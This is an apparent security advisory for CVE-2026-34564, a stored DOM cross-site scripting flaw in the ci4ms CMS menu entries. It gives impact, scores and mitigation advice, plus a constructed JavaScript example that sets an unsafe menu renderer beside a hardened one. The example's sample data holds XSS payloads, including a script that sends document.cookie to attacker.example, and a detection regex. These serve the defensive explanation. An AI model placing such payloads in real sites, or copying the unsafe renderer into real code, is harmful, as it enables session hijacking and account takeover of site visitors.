Platform: php
Component: ci4-cms-erp/ci4ms
Fixed in: 0.31.1, 0.31.0.0
CVE-2026-34564 describes a stored Cross-Site Scripting (XSS) vulnerability in the ci4-cms-erp/ci4ms CMS, where the injected payload is persisted in menu entries and rendered client-side (DOM-based). Script supplied through menu management (page titles and descriptions) is stored and then rendered to every user who loads the affected menu, which can expose both administrative interfaces and public-facing navigation menus. The vulnerability affects versions of ci4-cms-erp/ci4ms up to and including 0.28.6.0, with a fix available in version 0.31.0.0.
The impact is significant. Injected JavaScript executes in the site's origin in the browser of any user who views a page containing the affected menu, which enables session hijacking, account takeover, defacement, or redirection to attacker-controlled sites. Because the payload is stored rather than reflected, it does not depend on a victim clicking a crafted link: it fires for every visitor until the entry is cleaned up, and it can sit unnoticed for a long time.
CVE-2026-34564 was publicly disclosed on 2026-04-01. Its severity is rated CRITICAL (CVSS 9.1). No public proof-of-concept (PoC) code has been identified at the time of writing, and the EPSS score is low (0.04%), but stored XSS requires little more than the ability to save a menu entry, so the potential for exploitation should not be dismissed on that basis; note that this advisory does not state which privilege level is needed to create or edit menu entries. It is not currently listed in the CISA KEV catalog.
Exploit Status
EPSS: 0.04% (13th percentile)
CISA SSVC: not provided
CVSS Vector: not provided
The primary mitigation for CVE-2026-34564 is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. If upgrading immediately is not feasible, apply temporary workarounds: encode all user-supplied data at output time for the context it lands in (HTML body, attribute value, URL), especially page titles and descriptions used in menu entries, and validate input on the way in; in a CodeIgniter 4 view this means passing stored fields through the framework's esc() helper rather than echoing them raw. Also audit existing menu entries for payloads that were stored before the fix, since upgrading the code does not by itself remove malicious rows. A Web Application Firewall (WAF) tuned to block XSS payloads adds a layer of defense but is bypassable and is not a substitute for output encoding. Regularly scan the application for XSS vulnerabilities using automated tools.
Update ci4ms to version 0.31.0.0 or later. This version fixes the stored XSS vulnerability in menu management, preventing malicious code execution in user browsers.
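The following is an added example, not code from the ci4ms project or from this advisory, showing the rendering pattern that produces a stored DOM XSS next to a hardened version. The menu entries, attacker strings and function names are constructed for illustration; the href handling goes beyond the title and description fields the advisory names, but any menu renderer has to deal with it, since a stored link target is an XSS vector in its own right. In a browser the returned markup would be assigned to an element's innerHTML; here the functions return the string so it can be inspected.

```javascript
// Constructed sample: menu entries as they might sit in the CMS database after
// an attacker has saved a crafted title, description and link target.
const STORED_MENU_ENTRIES = [
  { title: "Home", description: "Front page", href: "/" },
  {
    title: '<img src=x onerror="alert(document.cookie)">',
    description: '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    href: "javascript:alert(1)",
  },
];

// VULNERABLE: stored fields are interpolated straight into markup. Once this
// string reaches innerHTML, the payload runs in every visitor's browser.
function renderMenuUnsafe(entries) {
  return entries
    .map(e => `<li><a href="${e.href}" title="${e.description}">${e.title}</a></li>`)
    .join("");
}

// HTML entity encoding, sufficient for text nodes and double-quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// URL context needs scheme validation, not just encoding: an encoded
// "javascript:" href still executes. Allow site-relative paths and http(s) only.
function safeHref(url) {
  const s = String(url).trim();
  if (s.startsWith("/") && !s.startsWith("//")) return s;
  try {
    const parsed = new URL(s);
    if (parsed.protocol === "http:" || parsed.protocol === "https:") return parsed.href;
  } catch (_) {
    // not an absolute URL; fall through to the inert default
  }
  return "#";
}

// HARDENED: every stored field is encoded for the context it is placed in.
function renderMenuSafe(entries) {
  return entries
    .map(e =>
      `<li><a href="${escapeHtml(safeHref(e.href))}" title="${escapeHtml(e.description)}">` +
      `${escapeHtml(e.title)}</a></li>`)
    .join("");
}

// Crude detector used to compare the two renderings: a live <script> or <img>
// tag, or a javascript: link target, means the payload survived rendering.
function containsActiveContent(html) {
  return /<(script|img)\b|href="javascript:/i.test(html);
}

console.log("unsafe:", renderMenuUnsafe(STORED_MENU_ENTRIES));
console.log("safe:  ", renderMenuSafe(STORED_MENU_ENTRIES));
```

The point the hardened version makes is that encoding is per context: escapeHtml() neutralises the title and description, but the link target has to be validated by scheme, because `&quot;`-style encoding does nothing to a `javascript:` URL. The same split applies server-side in a CodeIgniter 4 view, where esc() takes a context argument for exactly this reason.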
CVE-2026-34564 is a critical stored DOM XSS vulnerability in ci4-cms-erp/ci4ms versions up to 0.28.6.0, allowing attackers to inject malicious scripts via menu entries.
Yes. If you are running ci4-cms-erp/ci4ms version 0.28.6.0 or earlier, you are affected by this vulnerability.
Upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. As a temporary workaround, implement strict input validation and output encoding.
No public exploit is currently known and the EPSS score is low (0.04%), but the CRITICAL CVSS rating and the low effort a stored XSS demands from an attacker who can save a menu entry mean exploitation remains plausible.
Refer to the official ci4-cms-erp project repository or website for the latest security advisories and updates.